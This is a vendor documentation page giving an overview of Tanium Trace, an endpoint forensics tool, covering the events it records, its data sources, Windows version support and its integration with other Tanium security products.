Other resources

Release Notes

Support Knowledge Base
(login required)

Trace overview

Use Trace to directly investigate key forensic and security events on Linux, Mac, and Windows endpoints across a network. Trace provides a live and historical view of critical events including process execution, logon history, network connections, and file and registry changes. The Trace solution consists of three parts:

  • The Trace event recorder that monitors event data on the endpoint.
  • The Trace interface where you can explore and manage endpoint Trace data.
  • The sensors for issuing searches across the entire enterprise for Trace data.

About the Trace event recorder

The Trace event recorder continuously saves key forensic evidence on each endpoint. The event recorder monitors the endpoint kernel and other low-level subsystems to capture a variety of events.

Even an idle system quickly accumulates data. Trace intelligently collates similar events and efficiently stores them in a local database. The default configuration can retain up to several months of historical data. You can customize the amount of local storage that is consumed by Trace, and filter the types of recorded evidence.

Traditional disk and memory forensics techniques can successfully reconstruct fragments of endpoint activity, but are limited to the evidence that is natively preserved by the underlying operating system. This type of evidence from a period of interest can rapidly degrade as time elapses. Trace maintains a complete, easy-to-interpret history of events so you can replay recent system events.

Types of recorded events

Trace records a broad range of events, that include additional context and metadata, and UTC timestamps. Recorded event examples include: process execution, file system activity, registry changes, network connections, driver and library loads, and user authentication. You can specify which process, registry, network, file, and security events Trace records.

For more meaningful databases and to retain data for longer periods, consider excluding events that occur in high numbers; for example, LanguageList registry values.

Event filtering is based on the following types:

Table 1:   Event types
Event type Description
Driver Driver load events, including the full path and hash. For Windows, it also includes if the driver was digitally signed and the signing entity.

Driver events typically make up a small amount of events overall. You cannot filter driver events.

File File system events, such as files written to directory locations on the endpoint. The associated process and user context are included.

Possible examples are a malware file being copied to a location that Windows Update uses, or content changes made to a file.

Network Network connection events, such as an HTTP request to an internet location, including the associated process and user context. Events are recorded for all inbound and outbound TCP and UDP connections.
  • Outbound: Connections, attempts, successes, disconnects, and failures are logged.
  • Inbound: Only accepted connections and disconnects are logged.
Process Process create, child process create, and process exit events. The full command line, MD5 hash, parent process metadata, and user context are included.
Registry [Windows only] Changes to the registry including the creation or alteration of registry keys and values. Includes the associated process and user context.
Security Security events include authentication, privilege escalation, and more. This event type includes logon events, even if operating system logs have rolled.
DNS [Windows 8.1 or later] DNS request information, including the process path, user, query, response, and the type of operation.
Image

[Windows only] Image load events include:

  • The full path and hash

  • The entity that signed an image, or a designation of "Unsigned" if the image is not signed.

A possible example is the loading of an unsigned DLL.

Sources of event recorder data

The event recorder gathers data from multiple sources into a single, local database on the endpoint. Kernel events are gathered from Linux, Mac, and Windows tools. On Windows endpoints, the optional Microsoft Sysmon configuration provides additional information about the executed processes.

Some features of the Trace recorder require specific versions of Windows.

Table 2:   Trace recorder features
Feature Windows Server 2008 R2 Windows Server 2012 Windows Server 2012 R2 or later Windows 7 Windows 8 Windows 8.1 or later
DNS events Not Available Not Available Available Not Available Not Available Available
Process hashes and command-line information Requires Sysmon Available Available Requires Sysmon Available Available
Driver loads Available* Available Available Available* Available Available

* If Sysmon is configured, the driver load information recorded by Sysmon is used.

Integration with other Tanium products

When coupled with other Tanium products you can apply the findings from an investigation as you investigate or at any time after. The findings from an investigation are essential inputs to short and long-term remediation plans, and they can be developed in parallel to the investigation from the start.

Tanium™ Connect

Trace uses data from Tanium Connect to elaborate on process and driver hash events. The source data adds details about these events for an at-a-glance reputation status assessment from multiple threat intelligence providers.

Tanium™ Incident Response

Trace works with Tanium Incident Response to provide enterprise hunting at scale. Use sensors from either solution to search across endpoints by operating system or intrusion lifecycle phase, and for specific types of evidence. For example, use the Autorun Program Details sensor to search for all persistent binaries in your environment. Some sensors also include common use buttons that fill parameter fields, such as the Trace Executed Processes PowerShell Suspicious Command Line Arguments search on Windows endpoints. The results from all endpoints are presented as an actionable Interact grid within Trace.

Tanium™ Detect

Use Trace saved evidence from analyzed endpoints to create Tanium Detect indicators of compromise (IOC) intel documents to scan endpoints across the network. The event recorder monitors for Detect signals and notifies Detect if any events match the signal. Missing a single infected system, backdoor command-and-control address, or compromised set of user credentials can potentially allow an attacker to easily regain access and nullify the entire remediation effort.

Tanium™ Protect

Use Trace findings to create process and network rule policies for Windows endpoints in Tanium Protect to prevent future incidents across the network. Failing to identify and address more fundamental vulnerabilities exploited during an incident leaves the organization with no net improvement to their security posture.

Tanium™ Trends

Use any of the Trace saved questions in Tanium Trends boards and panels to provide graphical representation of Trace data overall. Trends can pivot from the overall view to Tanium Interact for specific responses by endpoint.

Figure  1:  Trends bar chart showing Trace database health by endpoint count

To obtain a license for these and other Tanium products, contact your Tanium Technical Account Manager (TAM).

Last updated: 6/12/2018 4:02 PM | Feedback